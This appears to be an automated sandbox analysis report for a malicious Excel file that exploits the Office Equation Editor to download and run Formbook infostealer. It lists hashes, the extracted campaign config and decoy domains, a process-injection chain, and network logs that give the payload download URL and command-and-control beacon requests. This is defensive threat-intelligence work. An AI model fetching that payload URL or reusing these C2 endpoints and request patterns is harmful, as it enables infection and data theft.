Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16/01/2025, 11:47 UTC

General

  • Target

    RFQ # PC25-1301_1.xlsx

  • Size

    1.8MB

  • MD5

    d3f593571da9b55237a49f9c23a12d9a

  • SHA1

    b3c9a6ca51802326e7de5a6854199fc369bc3b08

  • SHA256

    ff07908a590dec7673c510ec4d0043d8825a54039e35b7c28c299f95c55336c3

  • SHA512

    114950c12cc9fd0aa50544caed8fa0f710cc596c67ec90d3b5d2e1a72c18b5706b25ef3030949805be0e90bab31d6010fe6b0d1ab090e0651b0254482e113df8

  • SSDEEP

    49152:OwVliPFnflCwADoUpbmepmSTKrks1l4FWQCMsx7/:Ow4dflKxpaepmS2rksiWQJsx7/

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

hwu6

Decoy

lf758.vip

locerin-hair.shop

vytech.net

pet-insurance-intl-7990489.live

thepolithat.buzz

d66dr114gl.bond

suv-deals-49508.bond

job-offer-53922.bond

drstone1.click

lebahsemesta57.click

olmanihousel.shop

piedmontcsb.info

trisula888x.top

66sodovna.net

dental-implants-83810.bond

imxtld.club

frozenpines.net

ffgzgbl.xyz

tlc7z.rest

alexismuller.design

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook family
  • Formbook payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1232
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\RFQ # PC25-1301_1.xlsx"
      2⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:3020
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2836
    • C:\Users\Admin\AppData\Roaming\word.exe
      C:\Users\Admin\AppData\Roaming\word.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\SysWOW64\svchost.exe
        C:\Users\Admin\AppData\Roaming\word.exe
        3⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\SysWOW64\msiexec.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\SysWOW64\cmd.exe
            /c del "C:\Windows\SysWOW64\svchost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2556

Network

  • flag-us
    DNS
    combo.s3.eu-north-1.amazonaws.com
    EQNEDT32.EXE
    Remote address:
    8.8.8.8:53
    Request
    combo.s3.eu-north-1.amazonaws.com
    IN A
    Response
    combo.s3.eu-north-1.amazonaws.com
    IN CNAME
    s3-r-w.eu-north-1.amazonaws.com
    s3-r-w.eu-north-1.amazonaws.com
    IN A
    3.5.217.48
    s3-r-w.eu-north-1.amazonaws.com
    IN A
    16.12.11.46
  • flag-se
    GET
    http://combo.s3.eu-north-1.amazonaws.com/arkobral2.1.exe
    EQNEDT32.EXE
    Remote address:
    3.5.217.48:80
    Request
    GET /arkobral2.1.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: combo.s3.eu-north-1.amazonaws.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    x-amz-id-2: SAu2wUccT5p1/Pz0fTLO3UbcHwIBWCNTfoMP26ped63feP7wiQIUCQGIuQnu3Afix+LEJLSVS7tw2CMQTPpYBfFIixJlHpC8
    x-amz-request-id: XEZMQ2PGYQ9CMRJ3
    Date: Thu, 16 Jan 2025 11:47:07 GMT
    Last-Modified: Thu, 16 Jan 2025 06:34:07 GMT
    ETag: "a4c3a8129428b0447fbe11d005d1e04b"
    x-amz-server-side-encryption: AES256
    Accept-Ranges: bytes
    Content-Type: application/x-msdownload
    Content-Length: 1795072
    Server: AmazonS3
  • flag-us
    DNS
    www.aragamand.business
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.aragamand.business
    IN A
    Response
    www.aragamand.business
    IN A
    172.67.151.125
    www.aragamand.business
    IN A
    104.21.0.245
  • flag-us
    DNS
    www.aragamand.business
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.aragamand.business
    IN A
  • flag-us
    DNS
    www.aragamand.business
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.aragamand.business
    IN A
  • flag-us
    GET
    http://www.aragamand.business/hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    172.67.151.125:80
    Request
    GET /hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.aragamand.business
    Connection: close
  • flag-us
    DNS
    www.lebahsemesta57.click
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.lebahsemesta57.click
    IN A
    Response
    www.lebahsemesta57.click
    IN CNAME
    lebahsemesta57.click
    lebahsemesta57.click
    IN A
    198.252.111.49
  • flag-us
    GET
    http://www.lebahsemesta57.click/hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    198.252.111.49:80
    Request
    GET /hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.lebahsemesta57.click
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Thu, 16 Jan 2025 11:48:23 GMT
    server: LiteSpeed
  • flag-us
    DNS
    www.olmanihousel.shop
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.olmanihousel.shop
    IN A
    Response
    www.olmanihousel.shop
    IN CNAME
    shops.myshopify.com
    shops.myshopify.com
    IN A
    23.227.38.74
  • flag-ca
    GET
    http://www.olmanihousel.shop/hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    23.227.38.74:80
    Request
    GET /hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.olmanihousel.shop
    Connection: close
    Response
    HTTP/1.1 403 Forbidden
    Date: Thu, 16 Jan 2025 11:48:44 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4517
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: max-age=15
    Expires: Thu, 16 Jan 2025 11:48:59 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n73iEfnczrI5np0UUfhWv98b9h5k7mB92JFPy79KwOEZfLQbY6Uao5vqGo7sX5NNKRPtapYugU1CvAoObblu%2BdgisWHHtuAAd7wiyZjHclx1GrzGFZShwNIbjVIB7BLk5DBw2Ct71w%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
    Server-Timing: cfRequestDuration;dur=42.000055
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    X-Permitted-Cross-Domain-Policies: none
    X-Download-Options: noopen
    Server: cloudflare
    CF-RAY: 902de0d0aca2cd35-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    www.7b5846.online
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.7b5846.online
    IN A
    Response
    www.7b5846.online
    IN A
    104.21.40.196
    www.7b5846.online
    IN A
    172.67.188.70
  • flag-us
    GET
    http://www.7b5846.online/hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    104.21.40.196:80
    Request
    GET /hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.7b5846.online
    Connection: close
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 16 Jan 2025 11:49:04 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: close
    Cache-Control: max-age=3600
    Expires: Thu, 16 Jan 2025 12:49:04 GMT
    Location: https://7b5846.live
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BPEPuJ75g2Fqp%2BukC0FqJY5oSzKX3CrFl84Ll1AkR0xN6B9d3wbp7aglwbqK9fACEIUjro%2Bz0TTNrflgc4%2FfUFlC1xqX4Vq8EacdOgsSE7BHIEYKSEjtQUjRSyd3rW7blCulmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 902de14fa938652d-LHR
  • flag-us
    DNS
    www.skbdicat.xyz
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.skbdicat.xyz
    IN A
    Response
  • 3.5.217.48:80
    http://combo.s3.eu-north-1.amazonaws.com/arkobral2.1.exe
    http
    EQNEDT32.EXE
    58.8kB
    1.9MB
    1023
    1390

    HTTP Request

    GET http://combo.s3.eu-north-1.amazonaws.com/arkobral2.1.exe

    HTTP Response

    200
  • 172.67.151.125:80
    http://www.aragamand.business/hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    860 B
    196 B
    8
    4

    HTTP Request

    GET http://www.aragamand.business/hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0
  • 198.252.111.49:80
    http://www.lebahsemesta57.click/hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    398 B
    1.2kB
    5
    5

    HTTP Request

    GET http://www.lebahsemesta57.click/hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0

    HTTP Response

    404
  • 23.227.38.74:80
    http://www.olmanihousel.shop/hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    487 B
    5.7kB
    7
    8

    HTTP Request

    GET http://www.olmanihousel.shop/hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0

    HTTP Response

    403
  • 104.21.40.196:80
    http://www.7b5846.online/hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    391 B
    996 B
    5
    5

    HTTP Request

    GET http://www.7b5846.online/hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0

    HTTP Response

    301
  • 8.8.8.8:53
    combo.s3.eu-north-1.amazonaws.com
    dns
    EQNEDT32.EXE
    79 B
    132 B
    1
    1

    DNS Request

    combo.s3.eu-north-1.amazonaws.com

    DNS Response

    3.5.217.48
    16.12.11.46

  • 8.8.8.8:53
    www.aragamand.business
    dns
    Explorer.EXE
    204 B
    100 B
    3
    1

    DNS Request

    www.aragamand.business

    DNS Request

    www.aragamand.business

    DNS Request

    www.aragamand.business

    DNS Response

    172.67.151.125
    104.21.0.245

  • 8.8.8.8:53
    www.lebahsemesta57.click
    dns
    Explorer.EXE
    70 B
    100 B
    1
    1

    DNS Request

    www.lebahsemesta57.click

    DNS Response

    198.252.111.49

  • 8.8.8.8:53
    www.olmanihousel.shop
    dns
    Explorer.EXE
    67 B
    116 B
    1
    1

    DNS Request

    www.olmanihousel.shop

    DNS Response

    23.227.38.74

  • 8.8.8.8:53
    www.7b5846.online
    dns
    Explorer.EXE
    63 B
    95 B
    1
    1

    DNS Request

    www.7b5846.online

    DNS Response

    104.21.40.196
    172.67.188.70

  • 8.8.8.8:53
    www.skbdicat.xyz
    dns
    Explorer.EXE
    62 B
    62 B
    1
    1

    DNS Request

    www.skbdicat.xyz

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Roaming\word.exe

    Filesize

    1.7MB

    MD5

    a4c3a8129428b0447fbe11d005d1e04b

    SHA1

    003981a4a1fae8444bf94214045da837e9b545ad

    SHA256

    daab245fae21bc5fe9a8ea52e9770b22d12e66a4fbfc1bc1ca027f200da20f2f

    SHA512

    2c5d40db81eeab537eb1ab0ec8dbc1fd78f15969fbf4ec0d5ad2ae24f55aa2948f0bbd3dfbf7ef6444a7da5b1aa7b2584a4c86bc5322d3d647ca3da9ffe0003a

  • memory/1232-25-0x0000000004FD0000-0x0000000005075000-memory.dmp

    Filesize

    660KB

  • memory/2652-18-0x0000000000020000-0x0000000000034000-memory.dmp

    Filesize

    80KB

  • memory/2652-20-0x0000000000020000-0x0000000000034000-memory.dmp

    Filesize

    80KB

  • memory/2652-21-0x00000000000B0000-0x00000000000DF000-memory.dmp

    Filesize

    188KB

  • memory/2740-13-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2740-15-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/3020-1-0x00000000724BD000-0x00000000724C8000-memory.dmp

    Filesize

    44KB

  • memory/3020-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/3020-17-0x00000000724BD000-0x00000000724C8000-memory.dmp

    Filesize

    44KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.